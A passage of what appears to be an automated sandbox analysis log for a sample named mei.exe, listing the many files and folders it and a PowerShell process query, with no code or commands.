              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74682\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\mei.exeQueries volume information: C:\Users\user\Desktop\mei.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
